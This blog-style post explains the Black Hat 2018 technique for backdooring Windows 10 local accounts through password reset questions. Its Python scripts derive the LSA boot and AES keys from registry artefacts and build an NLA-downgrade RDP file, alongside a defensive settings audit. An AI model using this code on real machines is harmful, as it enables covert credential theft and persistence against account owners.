Security questions are Microsoft's way of letting people recover when they forget a password, and they are sometimes genuinely useful. This post focuses on the password reset questions in Windows 10.
Security questions have long been used for account recovery, and Windows 10 added them for local accounts in the April 2018 update (version 1803).
Yet things have changed recently. Large providers such as Google and Facebook have been moving away from security questions after concluding that the answers are often guessable or discoverable. The reasons may not be obvious to ordinary users, but they are obvious to attackers.
Here I am going to dive into the Windows 10 password reset questions, in the hope that it clears things up.
Set Windows 10 Password Reset Questions Remotely
Recently, infosec researchers presenting at Black Hat 2018 found a way to set the answers to Windows 10's password reset questions remotely and easily. The astonishing part is that they did not have to execute any code on the targeted device.
(Microsoft accounts are a separate matter: unlocking them has become easier now that security keys and Windows Hello can be used as sign-in methods. The rest of this post is about local accounts.)
Magal Baz and Tom Sela of Illusive Networks said that, with the combination of a simple Python script and some alarmingly straightforward registry tweaks, it was easy for them to:
- Define the password reset answers remotely.
- Reset a local user's password and afterwards restore the original one, so the change goes unnoticed.
Ordinary Users Can’t Change the Security Questions
The password reset questions in Windows 10 are hard-coded. You cannot write your own questions for your device; you pick from the six questions Microsoft provides, and the answers to those six questions are all that protects the password reset path into your machine.
Configuring the reset answers requires appropriate privileges (writing them takes administrative access to the target's registry). So this is not a way in from outside: it is a technique for an attacker who already has access to your network to gain near-invisible persistence on individual machines and survive attempts to lock them out.
The Windows registry stores a number of sensitive items in the well-known LSA Secrets, including:
- the local machine (computer) account password
- the passwords of service accounts
This information is meant to be secret, and it is protected well enough that even the step-by-step PowerShell guides Microsoft TechNet bloggers have published for inspecting it only show you the contents in encrypted form.
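The encryption is not independent of the machine: the key that unwraps the LSA secrets is derived from values that live in the registry of the same box. The following is an added example, not code from the original article or from the Illusive Networks tooling, showing that derivation with the standard library. It reassembles the boot key (the "SysKey") from the class names of the four subkeys under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, using the fixed byte permutation Windows applies, and then derives the AES-256 key that protects the LSA key blob stored in HKLM\SECURITY\Policy\PolEKList. The class-name values in the demo are constructed; the AES decryption of the blob itself is left out because it needs a third-party AES library.

```python
"""Added example: reassembling the Windows boot key from registry artefacts and
deriving the AES-256 key for the LSA key blob (HKLM\SECURITY\Policy\PolEKList).
Not part of the original article or the researchers' own script."""
import hashlib
from binascii import unhexlify

# The four subkeys whose *class names* (not values) hold the scrambled boot key,
# in the order Windows concatenates them, and the fixed permutation it then
# applies to the 16 resulting bytes.
LSA_SUBKEYS = ("JD", "Skew1", "GBG", "Data")
PERMUTATION = (8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7)


def boot_key_from_class_names(class_names: dict) -> bytes:
    """class_names maps each LSA subkey name to its 8-hex-char class string."""
    hexstr = "".join(class_names[name] for name in LSA_SUBKEYS)
    if len(hexstr) != 32:
        raise ValueError("expected four 8-character hex class names")
    scrambled = unhexlify(hexstr)
    return bytes(scrambled[i] for i in PERMUTATION)


def lsa_aes_key(boot_key: bytes, polek_value: bytes) -> bytes:
    """Derive the AES-256 key for the PolEKList blob.

    Layout of the registry value: 4-byte version, 16-byte key GUID, 4-byte
    algorithm id, 4-byte flags (28 bytes of header), then the encrypted data,
    whose first 32 bytes are a salt. Windows hashes the boot key followed by
    1000 copies of that salt with SHA-256; the digest is the AES-256 key."""
    if len(polek_value) < 60:
        raise ValueError("PolEKList value too short")
    salt = polek_value[28:60]
    h = hashlib.sha256(boot_key)
    for _ in range(1000):
        h.update(salt)
    return h.digest()


def read_live_class_names() -> dict:
    """Windows only: read the real class names with RegQueryInfoKeyW through
    ctypes (the winreg module does not expose a key's class string). Reading
    these keys needs administrative access."""
    import ctypes
    import winreg
    from ctypes import wintypes

    adv = ctypes.WinDLL("advapi32", use_last_error=True)
    fn = adv.RegQueryInfoKeyW
    fn.argtypes = [wintypes.HKEY, wintypes.LPWSTR, wintypes.LPDWORD] + \
                  [wintypes.LPDWORD] * 8 + [ctypes.c_void_p]
    fn.restype = wintypes.LONG
    out = {}
    for name in LSA_SUBKEYS:
        path = r"SYSTEM\CurrentControlSet\Control\Lsa" + "\\" + name
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            buf = ctypes.create_unicode_buffer(64)
            size = wintypes.DWORD(64)
            rc = fn(key.handle, buf, ctypes.byref(size),
                    None, None, None, None, None, None, None, None, None)
            if rc != 0:
                raise OSError(rc, "RegQueryInfoKeyW failed for " + name)
            out[name] = buf.value
    return out


if __name__ == "__main__":
    # Constructed class names (not from a real machine) to show the scramble.
    demo = {"JD": "00010203", "Skew1": "04050607",
            "GBG": "08090a0b", "Data": "0c0d0e0f"}
    bk = boot_key_from_class_names(demo)
    print("boot key:", bk.hex())
    # Constructed PolEKList value: 28-byte header, 32-byte salt, 16 bytes of
    # ciphertext. Only the salt matters for the key derivation shown here.
    fake_polek = b"\x00" * 28 + bytes(range(32)) + b"\xaa" * 16
    print("AES-256 key for the LSA key blob:", lsa_aes_key(bk, fake_polek).hex())
```

On a real machine, `boot_key_from_class_names(read_live_class_names())` gives the boot key and the PolEKList value comes from the SECURITY hive (readable as SYSTEM, or remotely through the Remote Registry service with administrative rights). The same boot key also unwraps the SAM hive, which is where the password and password-history hashes discussed below live.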
How to Make It Possible to Define Password Reset Questions
Yet there is a way around the encryption. The key point is that the AES key protecting the LSA secrets is itself derived from artefacts stored in the registry of the same machine; collect those artefacts and you can reassemble the key.
As a result, anyone with full (administrative) access to a machine's registry, whether locally or over the Remote Registry service, can recover the key and use it to rewrite the LSA Secrets, including the stored reset answers, at will.
The Working Process
- After opening a Remote Desktop session to the target machine you see the standard Windows logon screen. Look closely and you will notice there is no "reset password" link on it.
- If you force the Remote Desktop session to fall back from Network Level Authentication (NLA), that protection is bypassed.
- An RDP client that tells the server it does not support NLA can ask it for the old-style Windows logon screen, which does carry a password reset option. This is why Magal Baz and Tom Sela built an RDP file with the appropriate flag set.
- Once you reach the standard password reset screen you can establish persistence. Simply changing the password would be noticed quickly, because the legitimate user loses local access; it is a different matter if you can restore the password to the one the user already knows.
- Windows keeps the hashes of old passwords in the registry, encrypted, to enforce password history and stop people reusing them. With full access to the registry you can read them.
- Using an API that sets the password hash directly, you can then write the previous hash back as the active one, restoring the user's original password.
In effect you have changed a password on the target machine, used it, and put it back, and nobody is likely to notice.
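Two pieces of the procedure above are worth seeing concretely: the client-side flag that declines NLA, and the server-side settings that decide whether that downgrade is accepted at all. The following is an added example, not code from the original article or from the researchers' script. It writes an `.rdp` file for mstsc with `enablecredsspsupport:i:0`, which is the switch that makes the client refuse CredSSP (NLA), and it audits the three registry values a defender checks to close the route: `UserAuthentication` and `SecurityLayer` under the RDP-Tcp listener (require NLA over TLS), and the `NoLocalPasswordResetQuestions` policy value, which corresponds to the Group Policy setting "Prevent the use of security questions for local accounts". The `assess` function takes a plain dictionary so it can be run and tested offline; `read_live_settings` reads the real values on a Windows host. The hostname in the demo is constructed.

```python
"""Added example: the NLA-downgrade .rdp file and a server-side audit of the
settings that make the downgrade possible. Not part of the original article
or the researchers' tooling."""
import sys

# Registry paths (names are the real ones used by the RDP listener and by the
# Credential User Interface policy).
RDP_TCP = r"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
CREDUI_POLICY = r"SOFTWARE\Policies\Microsoft\Windows\System"


def downgrade_rdp_file(host: str, port: int = 3389) -> str:
    """Contents of an mstsc .rdp file that declines NLA.

    enablecredsspsupport:i:0  -> client does not offer CredSSP, so a server
                                 that allows it falls back to the legacy
                                 logon screen (the one with the reset link)
    authentication level:i:0  -> connect even if server authentication fails
    A server that requires NLA simply rejects such a connection."""
    lines = [
        f"full address:s:{host}:{port}",
        "enablecredsspsupport:i:0",
        "authentication level:i:0",
        "negotiate security layer:i:1",
        "prompt for credentials:i:0",
    ]
    return "\n".join(lines) + "\n"


def assess(settings: dict) -> list:
    """settings maps value name -> DWORD, or None when the value is absent.
    Returns a list of findings; an empty list means the route is closed."""
    findings = []
    if settings.get("UserAuthentication") != 1:
        findings.append(
            "NLA is not required (UserAuthentication != 1): a client that "
            "declines CredSSP gets the legacy logon screen with the reset link")
    if settings.get("SecurityLayer") == 0:
        findings.append(
            "SecurityLayer is 0 (legacy RDP security): the logon screen is "
            "shown before any authentication; set it to 2 (TLS)")
    if settings.get("NoLocalPasswordResetQuestions") != 1:
        findings.append(
            "Security questions for local accounts are enabled: set the policy "
            "'Prevent the use of security questions for local accounts' "
            "(NoLocalPasswordResetQuestions = 1)")
    return findings


def read_live_settings() -> dict:
    """Windows only: read the three values from the local registry."""
    import winreg

    def dword(path, name):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
                value, kind = winreg.QueryValueEx(key, name)
                return value if kind == winreg.REG_DWORD else None
        except OSError:
            return None

    return {
        "UserAuthentication": dword(RDP_TCP, "UserAuthentication"),
        "SecurityLayer": dword(RDP_TCP, "SecurityLayer"),
        "NoLocalPasswordResetQuestions":
            dword(CREDUI_POLICY, "NoLocalPasswordResetQuestions"),
    }


if __name__ == "__main__":
    # Constructed target name; on a real engagement this is the victim host.
    print(downgrade_rdp_file("victim.example.local"))
    if sys.platform == "win32":
        live = read_live_settings()
    else:
        # Constructed sample of a weakly configured server, for offline runs.
        live = {"UserAuthentication": 0, "SecurityLayer": 1,
                "NoLocalPasswordResetQuestions": None}
    for finding in assess(live) or ["no findings: NLA required, questions disabled"]:
        print("-", finding)
```

Note that `UserAuthentication` is also set by the Group Policy "Require user authentication for remote connections by using Network Level Authentication"; when that policy applies, the registry value reflects it. Disabling the reset questions removes the persistence vector entirely, while requiring NLA only removes this particular way of reaching the reset screen.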